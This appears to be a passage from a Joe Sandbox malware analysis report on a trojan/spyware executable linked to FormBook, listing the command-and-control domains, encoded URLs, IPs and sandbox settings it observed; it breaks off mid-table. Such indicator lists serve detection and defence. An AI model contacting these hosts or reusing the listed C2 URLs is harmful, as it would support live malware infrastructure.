            www.antonio-vivaldi.mobi9%VirustotalBrowse
            www.3xfootball.com10%VirustotalBrowse
            www.empowermedeco.com5%VirustotalBrowse
            elettrosistemista.zip11%VirustotalBrowse
            www.k9vyp11no3.cfd9%VirustotalBrowse
            www.b301.space6%VirustotalBrowse
            www.elettrosistemista.zip7%VirustotalBrowse
            www.joyesi.xyz4%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
            http://www.empowermedeco.com/fo8o/100%Avira URL Cloudmalware
            https://www.reg.com/domain/prolong_period_anonymous?dname=www.b301.space&utm_source=www.b301.space&u0%Avira URL Cloudsafe
            https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
            http://www.shenzhoucui.com/fo8o/?Ixe=Apq4tPPXNdTp2&blWd=CKPof6WmPR8MjyGgZoDlhb60KxQVVSuHH5TS1bRPLOh5omNg/qt+/6bvCL2pthCxfTLrkj/U4P5Lt/hzCRdBTD8WClZdEhsa3dPrDeE1SdlnJbrG6MsWCo/sylvA1Bg/24QA05c=100%Avira URL Cloudmalware
            http://www.goldenjade-travel.com/fo8o/?Ixe=Apq4tPPXNdTp2&blWd=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFxgszkgIsi8wfa6/CPqkeX1kME9DjI2TvouO65OvKk6Nl8OEvQ/8=0%Avira URL Cloudsafe
            http://yourmine.ru/i/parking/glob_parking.png0%Avira URL Cloudsafe
            https://duckduckgo.com/ac/?q=0%VirustotalBrowse
            https://www.value-domain.com/0%VirustotalBrowse
            https://www.value-domain.com/0%Avira URL Cloudsafe
            https://duckduckgo.com/chrome_newtab0%VirustotalBrowse
            http://yourmine.ru/i/parking/glob_parking.png0%VirustotalBrowse
            http://www.donnavariedades.com/fo8o/?blWd=l+301ZvITCxaX9AHm1YsL655mgOT9ufJgzctOQx29qSsrxX8kw49ykgmumiYYU42xMGxVig5KVZrJosPbs9pCTG1dl0n9Zx5sBovXqlibLG+oTQgCZHMA1AF4xfdSZkJv4XAGCI=&Ixe=Apq4tPPXNdTp20%Avira URL Cloudsafe
            https://www.colorfulbox.jp/common/img/bnr/colorfulbox_bnr01.png0%Avira URL Cloudsafe
            http://www.liangyuen528.com/fo8o/100%Avira URL Cloudmalware
            http://www.magmadokum.com/fo8o/0%Avira URL Cloudsafe
            https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_0%Avira URL Cloudsafe
            https://www.colorfulbox.jp/common/img/bnr/colorfulbox_bnr01.png0%VirustotalBrowse
            http://www.antonio-vivaldi.mobi/fo8o/?blWd=PTl5gU/3CD/Xhg5Nd1HWi+eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0GdHAsD0mFxNrARF0zWd8CLwvHKbs6Za05B0b8lb0SJyq2CvxKSeitE8AGVnlTlldZE82pgolkPyTnRDO8=&Ixe=Apq4tPPXNdTp20%Avira URL Cloudsafe
            https://www.google.com0%Avira URL Cloudsafe
            https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_0%VirustotalBrowse
            http://www.magmadokum.com/fo8o/11%VirustotalBrowse
            http://www.rssnewscast.com/fo8o/0%Avira URL Cloudsafe
            http://www.empowermedeco.com/fo8o/8%VirustotalBrowse
            http://www.liangyuen528.com/fo8o/?Ixe=Apq4tPPXNdTp2&blWd=iiIkdrB6KYcVQoN0c6CfZniI+lK17wmUSOc41yM1Q/k97jiJcokuWPbOTxiCodGWiOQkUrp21l37eyMeLTp+RFkz+4bzDeEKKqRZgAR6qoTILtOL6EdJZhJZBnFdSPOr30I02M8=100%Avira URL Cloudmalware
            http://www.liangyuen528.com/fo8o/6%VirustotalBrowse
            http://www.elettrosistemista.zip/fo8o/?Ixe=Apq4tPPXNdTp2&blWd=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMMgl3a4mkxzPbkN9BQKjpJMF6ezHcknvvvjzNmyPcHDwhODu1wVk=100%Avira URL Cloudmalware
            https://www.google.com0%VirustotalBrowse
            http://www.empowermedeco.com/fo8o/?blWd=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKYS1O+KnDGu0Ee7a9fQq7JRnHJ6pn6i4sEdb7G20jo8euDHkgubc=&Ixe=Apq4tPPXNdTp2100%Avira URL Cloudmalware
            http://www.kasegitai.tokyo/fo8o/100%Avira URL Cloudmalware
            http://www.shenzhoucui.com/fo8o/100%Avira URL Cloudmalware
            https://2domains.ru/0%Avira URL Cloudsafe
            http://www.rssnewscast.com/fo8o/?blWd=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNp7YHjVi2aBezyBUOenUja13YBEIShwN33HoHbXtrY+oqbh1getk=&Ixe=Apq4tPPXNdTp20%Avira URL Cloudsafe
            http://www.joyesi.xyz/fo8o/?Ixe=Apq4tPPXNdTp2&blWd=4jpq/azRsxa5RUjY86tNWfjSBjUfGmQA/bC5edk8IUrTRSqWoRPa/8wzulAZuqVnvDzKNkDL1IzsWztH+C0v0tvbjYVZrXx7xEZksJc7712LnlYWiWRTV2JAY9clvZ1jJotY128=0%Avira URL Cloudsafe
            http://www.goldenjade-travel.com/fo8o/0%Avira URL Cloudsafe
            https://parking.reg.ru/script/get_domain_data?domain_name=www.b301.space&rand=0%Avira URL Cloudsafe
            http://www.joyesi.xyz/fo8o/0%Avira URL Cloudsafe
            http://www.rssnewscast.com/fo8o/5%VirustotalBrowse
            https://2domains.ru0%Avira URL Cloudsafe
            http://www.antonio-vivaldi.mobi/fo8o/0%Avira URL Cloudsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
            http://www.elettrosistemista.zip/fo8o/100%Avira URL Cloudmalware
            https://www.empowermedeco.com/fo8o/?blWd=mxnR100%Avira URL Cloudmalware
            http://www.donnavariedades.com/fo8o/0%Avira URL Cloudsafe
            http://www.b301.space/0%Avira URL Cloudsafe
            https://code.jquery.com/jquery-3.7.1.min.js0%Avira URL Cloudsafe
            http://www.kasegitai.tokyo/fo8o/?blWd=0LNqIGaAWMhMIMLJ2VJjkgaiCF/+7LEr9lFre+yu3/9GvRNYi1uHmkVftE7qrB4Q/AkDmlcR4eDvWrml8CJ8ssmc93kihOWHWb8NTA0vbQpCHGBmxgdm5sPEbG1Wvor0LSPPjnI=&Ixe=Apq4tPPXNdTp2100%Avira URL Cloudmalware
            https://www.sedo.com/services/parking.php30%Avira URL Cloudsafe
            https://codepen.io/uzcho_/pens/popular/?grid_type=list0%Avira URL Cloudsafe
            http://www.b301.space/fo8o/?blWd=AU3XYvZFaGSlytwuLg8MPaUQqx3yoZo+slWhncsJrkz7OmZN7i/xsh6l91syvPfChHr514cSZiYi12sQUpLBNWUGgXkiv5tYdsczWAt3YIqQCRozzWbYSNnfkFwi3fxcOtzIASs=&Ixe=Apq4tPPXNdTp20%Avira URL Cloudsafe
            https://www.reg.com/domain/service/domain-broker?dname=www.b301.space&utm_source=www.b301.space&utm_0%Avira URL Cloudsafe
            http://www.b301.space/fo8o/0%Avira URL Cloudsafe
            https://codepen.io/uzcho_/pen/eYdmdXw.css0%Avira URL Cloudsafe
            https://www.reg.com/domain/new/rereg_details?dname=www.b301.space&utm_source=www.b301.space&utm_medi0%Avira URL Cloudsafe
            https://rakkoma.com/0%Avira URL Cloudsafe
            https://www.value-domain.com/modall.php0%Avira URL Cloudsafe
            http://www.b301.space0%Avira URL Cloudsafe
            http://www.magmadokum.com/fo8o/?Ixe=Apq4tPPXNdTp2&blWd=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjNWAySNtnq/EMXCTP7S4oEh8mb9sAZyquFiTVTuU6HpMKOeASrGw=0%Avira URL Cloudsafe
            http://www.techchains.info/fo8o/100%Avira URL Cloudphishing
            https://reg.ru?target=_blank0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.donnavariedades.com
            		15.197.240.20
            		truefalseunknown
            empowermedeco.com
            		217.196.55.202
            		truefalseunknown
            www.liangyuen528.com
            		15.197.172.60
            		truefalseunknown
            natroredirect.natrocdn.com
            		85.159.66.93
            		truefalseunknown
            www.kasegitai.tokyo
            		52.25.92.0
            		truefalseunknown
            elettrosistemista.zip
            		195.110.124.133
            		truefalseunknown
            www.3xfootball.com
            		154.215.72.110
            		truefalseunknown
            www.shenzhoucui.com
            		72.52.178.23
            		truefalseunknown
            www.antonio-vivaldi.mobi
            		46.30.211.38
            		truefalseunknown
            www.goldenjade-travel.com
            		116.50.37.244
            		truefalseunknown
            www.rssnewscast.com
            		91.195.240.94
            		truefalseunknown
            www.techchains.info
            		66.29.149.46
            		truefalseunknown
            www.b301.space
            		194.67.71.191
            		truefalseunknown
            www.magmadokum.com
            		unknown
            		unknowntrueunknown
            www.660danm.top
            		unknown
            		unknowntrueunknown
            www.joyesi.xyz
            		unknown
            		unknowntrueunknown
            www.empowermedeco.com
            		unknown
            		unknowntrueunknown
            www.k9vyp11no3.cfd
            		unknown
            		unknowntrueunknown
            www.elettrosistemista.zip
            		unknown
            		unknowntrueunknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://www.shenzhoucui.com/fo8o/?Ixe=Apq4tPPXNdTp2&blWd=CKPof6WmPR8MjyGgZoDlhb60KxQVVSuHH5TS1bRPLOh5omNg/qt+/6bvCL2pthCxfTLrkj/U4P5Lt/hzCRdBTD8WClZdEhsa3dPrDeE1SdlnJbrG6MsWCo/sylvA1Bg/24QA05c=false
            • Avira URL Cloud: malware
            		unknown
            http://www.empowermedeco.com/fo8o/false
            • 8%, Virustotal, Browse
            • Avira URL Cloud: malware
            		unknown
            http://www.goldenjade-travel.com/fo8o/?Ixe=Apq4tPPXNdTp2&blWd=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFxgszkgIsi8wfa6/CPqkeX1kME9DjI2TvouO65OvKk6Nl8OEvQ/8=false
            • Avira URL Cloud: safe
            		unknown
            http://www.donnavariedades.com/fo8o/?blWd=l+301ZvITCxaX9AHm1YsL655mgOT9ufJgzctOQx29qSsrxX8kw49ykgmumiYYU42xMGxVig5KVZrJosPbs9pCTG1dl0n9Zx5sBovXqlibLG+oTQgCZHMA1AF4xfdSZkJv4XAGCI=&Ixe=Apq4tPPXNdTp2true
            • Avira URL Cloud: safe
            		unknown
            http://www.liangyuen528.com/fo8o/false
            • 6%, Virustotal, Browse
            • Avira URL Cloud: malware
            		unknown
            http://www.magmadokum.com/fo8o/false
            • 11%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://www.antonio-vivaldi.mobi/fo8o/?blWd=PTl5gU/3CD/Xhg5Nd1HWi+eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0GdHAsD0mFxNrARF0zWd8CLwvHKbs6Za05B0b8lb0SJyq2CvxKSeitE8AGVnlTlldZE82pgolkPyTnRDO8=&Ixe=Apq4tPPXNdTp2false
            • Avira URL Cloud: safe
            		unknown
            http://www.rssnewscast.com/fo8o/false
            • 5%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://www.liangyuen528.com/fo8o/?Ixe=Apq4tPPXNdTp2&blWd=iiIkdrB6KYcVQoN0c6CfZniI+lK17wmUSOc41yM1Q/k97jiJcokuWPbOTxiCodGWiOQkUrp21l37eyMeLTp+RFkz+4bzDeEKKqRZgAR6qoTILtOL6EdJZhJZBnFdSPOr30I02M8=false
            • Avira URL Cloud: malware
            		unknown
            http://www.elettrosistemista.zip/fo8o/?Ixe=Apq4tPPXNdTp2&blWd=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMMgl3a4mkxzPbkN9BQKjpJMF6ezHcknvvvjzNmyPcHDwhODu1wVk=false
            • Avira URL Cloud: malware
            		unknown
            http://www.empowermedeco.com/fo8o/?blWd=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKYS1O+KnDGu0Ee7a9fQq7JRnHJ6pn6i4sEdb7G20jo8euDHkgubc=&Ixe=Apq4tPPXNdTp2false
            • Avira URL Cloud: malware
            		unknown
            http://www.kasegitai.tokyo/fo8o/false
            • Avira URL Cloud: malware
            		unknown
            http://www.shenzhoucui.com/fo8o/false
            • Avira URL Cloud: malware
            		unknown
            http://www.rssnewscast.com/fo8o/?blWd=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNp7YHjVi2aBezyBUOenUja13YBEIShwN33HoHbXtrY+oqbh1getk=&Ixe=Apq4tPPXNdTp2false
            • Avira URL Cloud: safe
            		unknown
            http://www.joyesi.xyz/fo8o/?Ixe=Apq4tPPXNdTp2&blWd=4jpq/azRsxa5RUjY86tNWfjSBjUfGmQA/bC5edk8IUrTRSqWoRPa/8wzulAZuqVnvDzKNkDL1IzsWztH+C0v0tvbjYVZrXx7xEZksJc7712LnlYWiWRTV2JAY9clvZ1jJotY128=false
            • Avira URL Cloud: safe
            		unknown
            http://www.goldenjade-travel.com/fo8o/false
            • Avira URL Cloud: safe
            		unknown
            http://www.joyesi.xyz/fo8o/false
            • Avira URL Cloud: safe
            		unknown
            http://www.antonio-vivaldi.mobi/fo8o/false
            • Avira URL Cloud: safe
            		unknown
            http://www.elettrosistemista.zip/fo8o/false
            • Avira URL Cloud: malware
            		unknown
            http://www.donnavariedades.com/fo8o/true
            • Avira URL Cloud: safe
            		unknown
            http://www.kasegitai.tokyo/fo8o/?blWd=0LNqIGaAWMhMIMLJ2VJjkgaiCF/+7LEr9lFre+yu3/9GvRNYi1uHmkVftE7qrB4Q/AkDmlcR4eDvWrml8CJ8ssmc93kihOWHWb8NTA0vbQpCHGBmxgdm5sPEbG1Wvor0LSPPjnI=&Ixe=Apq4tPPXNdTp2false
            • Avira URL Cloud: malware
            		unknown
            http://www.b301.space/fo8o/?blWd=AU3XYvZFaGSlytwuLg8MPaUQqx3yoZo+slWhncsJrkz7OmZN7i/xsh6l91syvPfChHr514cSZiYi12sQUpLBNWUGgXkiv5tYdsczWAt3YIqQCRozzWbYSNnfkFwi3fxcOtzIASs=&Ixe=Apq4tPPXNdTp2false
            • Avira URL Cloud: safe
            		unknown
            http://www.b301.space/fo8o/false
            • Avira URL Cloud: safe
            		unknown
            http://www.magmadokum.com/fo8o/?Ixe=Apq4tPPXNdTp2&blWd=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjNWAySNtnq/EMXCTP7S4oEh8mb9sAZyquFiTVTuU6HpMKOeASrGw=false
            • Avira URL Cloud: safe
            		unknown
            http://www.techchains.info/fo8o/false
            • Avira URL Cloud: phishing
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            https://duckduckgo.com/chrome_newtabnetbtugc.exe, 00000004.00000002.4582345047.000000000769A000.00000004.00000020.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://duckduckgo.com/ac/?q=netbtugc.exe, 00000004.00000002.4582345047.000000000769A000.00000004.00000020.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://www.reg.com/domain/prolong_period_anonymous?dname=www.b301.space&utm_source=www.b301.space&unetbtugc.exe, 00000004.00000002.4580387603.00000000052A2000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000004D02000.00000004.00000001.00040000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://yourmine.ru/i/parking/glob_parking.pngnetbtugc.exe, 00000004.00000002.4580387603.00000000052A2000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000004D02000.00000004.00000001.00040000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://www.value-domain.com/netbtugc.exe, 00000004.00000002.4580387603.0000000003CA6000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000003706000.00000004.00000001.00040000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://www.colorfulbox.jp/common/img/bnr/colorfulbox_bnr01.pngnetbtugc.exe, 00000004.00000002.4580387603.0000000003CA6000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000003706000.00000004.00000001.00040000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=netbtugc.exe, 00000004.00000002.4582345047.000000000769A000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_netbtugc.exe, 00000004.00000002.4580387603.00000000042EE000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4582252078.0000000005C20000.00000004.00000800.00020000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000003D4E000.00000004.00000001.00040000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://www.google.comnetbtugc.exe, 00000004.00000002.4582252078.0000000005C20000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4580387603.0000000004DEC000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.000000000484C000.00000004.00000001.00040000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchnetbtugc.exe, 00000004.00000002.4582345047.000000000769A000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://2domains.ru/netbtugc.exe, 00000004.00000002.4580387603.00000000052A2000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000004D02000.00000004.00000001.00040000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://parking.reg.ru/script/get_domain_data?domain_name=www.b301.space&rand=netbtugc.exe, 00000004.00000002.4580387603.00000000052A2000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000004D02000.00000004.00000001.00040000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://2domains.runetbtugc.exe, 00000004.00000002.4580387603.00000000052A2000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000004D02000.00000004.00000001.00040000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=netbtugc.exe, 00000004.00000002.4582345047.000000000769A000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://www.ecosia.org/newtab/netbtugc.exe, 00000004.00000002.4582345047.000000000769A000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://www.empowermedeco.com/fo8o/?blWd=mxnRnetbtugc.exe, 00000004.00000002.4580387603.0000000004C5A000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.00000000046BA000.00000004.00000001.00040000.00000000.sdmpfalse
            • Avira URL Cloud: malware
            		unknown
            http://www.b301.space/netbtugc.exe, 00000004.00000002.4580387603.00000000052A2000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000004D02000.00000004.00000001.00040000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://code.jquery.com/jquery-3.7.1.min.jsnetbtugc.exe, 00000004.00000002.4580387603.0000000003CA6000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000003706000.00000004.00000001.00040000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://www.sedo.com/services/parking.php3WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000003D4E000.00000004.00000001.00040000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://ac.ecosia.org/autocomplete?q=netbtugc.exe, 00000004.00000002.4582345047.000000000769A000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://codepen.io/uzcho_/pens/popular/?grid_type=listnetbtugc.exe, 00000004.00000002.4580387603.0000000004612000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000004072000.00000004.00000001.00040000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://www.reg.com/domain/service/domain-broker?dname=www.b301.space&utm_source=www.b301.space&utm_WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000004D02000.00000004.00000001.00040000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://codepen.io/uzcho_/pen/eYdmdXw.cssnetbtugc.exe, 00000004.00000002.4580387603.0000000004612000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000004072000.00000004.00000001.00040000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://www.reg.com/domain/new/rereg_details?dname=www.b301.space&utm_source=www.b301.space&utm_medinetbtugc.exe, 00000004.00000002.4580387603.00000000052A2000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000004D02000.00000004.00000001.00040000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://rakkoma.com/WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000003706000.00000004.00000001.00040000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://www.value-domain.com/modall.phpWOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000003706000.00000004.00000001.00040000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.b301.spaceWOaBXdWwIJKzuV.exe, 00000008.00000002.4581093569.000000000561F000.00000040.80000000.00040000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=netbtugc.exe, 00000004.00000002.4582345047.000000000769A000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://reg.ru?target=_blanknetbtugc.exe, 00000004.00000002.4580387603.00000000052A2000.00000004.10000000.00040000.00000000.sdmp, WOaBXdWwIJKzuV.exe, 00000008.00000002.4578560291.0000000004D02000.00000004.00000001.00040000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown

            World Map of Contacted IPs

            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs

            Public IPs

            IPDomainCountryFlagASNASN NameMalicious
            91.195.240.94
            		www.rssnewscast.comGermany
            		47846SEDO-ASDEfalse
            15.197.240.20
            		www.donnavariedades.comUnited States
            		7430TANDEMUSfalse
            52.25.92.0
            		www.kasegitai.tokyoUnited States
            		16509AMAZON-02USfalse
            116.50.37.244
            		www.goldenjade-travel.comTaiwan; Republic of China (ROC)
            		18046DONGFONG-TWDongFongTechnologyCoLtdTWfalse
            199.59.243.226
            		unknownUnited States
            		395082BODIS-NJUSfalse
            85.159.66.93
            		natroredirect.natrocdn.comTurkey
            		34619CIZGITRfalse
            66.29.149.46
            		www.techchains.infoUnited States
            		19538ADVANTAGECOMUSfalse
            72.52.178.23
            		www.shenzhoucui.comUnited States
            		32244LIQUIDWEBUSfalse
            154.215.72.110
            		www.3xfootball.comSeychelles
            		132839POWERLINE-AS-APPOWERLINEDATACENTERHKfalse
            195.110.124.133
            		elettrosistemista.zipItaly
            		39729REGISTER-ASITfalse
            194.67.71.191
            		www.b301.spaceRussian Federation
            		197695AS-REGRUfalse
            46.30.211.38
            		www.antonio-vivaldi.mobiDenmark
            		51468ONECOMDKfalse
            15.197.172.60
            		www.liangyuen528.comUnited States
            		7430TANDEMUSfalse
            217.196.55.202
            		empowermedeco.comNorway
            		29300AS-DIRECTCONNECTNOfalse

            General Information

            Joe Sandbox version:40.0.0 Tourmaline
            Analysis ID:1486705
            Start date and time:2024-08-02 13:49:33 +02:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 10m 49s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:9
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:2
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:QLLafoDdqv.exe
            renamed because original name is a hash value
            Original Sample Name:16a3ae414f6303383d089b24318edcedb5891f081108035ee2017c3a61ab0012.exe
            Detection:MAL
            Classification:mal100.troj.spyw.evad.winEXE@7/5@18/14
            EGA Information:
            • Successful, ratio: 75%
            HCA Information:
            • Successful, ratio: 91%
            • Number of executed functions: 50
            • Number of non-executed functions: 283
            Cookbook Comments:
            • Found application associated with file extension: .exe
            • Override analysis time to 240000 for current running targets taking high CPU consumption

            Warnings

            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
            • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
            • Report creation exceeded maximum time and may have missing disassembly code information.
            • Report size exceeded maximum capacity and may have missing disassembly code.
            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

            Simulations

            Behavior and APIs

            TimeTypeDescription
            07:51:14API Interceptor11427540x Sleep call for process: netbtugc.exe modified

            Joe Sandbox View / Context

            IPs

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            91.195.240.94bum2sl4tSW66Q5O.exeGet hashmaliciousFormBook, PureLog StealerBrowse
            • www.seancollinsmusic.com/ps15/?t8o4=IiUdWomF5k9qaWufAEOF1gY9kHVftwkJ6cV9tSoeDtYAHjCeVDLi568qZcu0mi0k9Trm&jPj8q=pFQLwhtH0
            5.exeGet hashmaliciousFormBookBrowse
            • www.nadiiadrinkscoffee.com/ge34/?Hp=X6AHZfrXbRHH7xE&pP=DtaDJi3z2nipX4nJS/IcJCcbDk/4k1gE0+TxNtH8tFZPjGhx/2qD/OBkCIHBCYb1eipf
            factura.exeGet hashmaliciousFormBookBrowse
            • www.ssgame56c.org/qpcj/?IVD=vTEpW4TmB&PCKydxRp=hXmtMExE2v9HEeiW+ulHLkzTySI3TL5baDMJUDroKowqF3JNdygLwqeM0chXN5g2/8j8rpp6Ovu5nc6C/eq8J6bvYVTB8B/ZOQ8YY77+xTTm
            Document TOP19928.exeGet hashmaliciousFormBookBrowse
            • www.rssnewscast.com/fo8o/
            wOoESPII08.exeGet hashmaliciousFormBookBrowse
            • www.rssnewscast.com/fo8o/?xVY=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdN4JwRnXK0Z16Z0RVxT0NpaHfOGkEn8Q==&Nz=LPhpDRap3
            opp46lGmxd.exeGet hashmaliciousFormBookBrowse
            • www.rssnewscast.com/fo8o/
            mzrHGroQZy.htaGet hashmaliciousFormBookBrowse
            • www.rssnewscast.com/fo8o/
            j5Gx6UXYOm.exeGet hashmaliciousFormBookBrowse
            • www.rssnewscast.com/fo8o/
            5fG4r07BPy.exeGet hashmaliciousFormBookBrowse
            • www.rssnewscast.com/fo8o/
            eGHWPCyhLI.exeGet hashmaliciousFormBookBrowse
            • www.rssnewscast.com/fo8o/
            15.197.240.20LF2024022.exeGet hashmaliciousFormBook, PureLog StealerBrowse
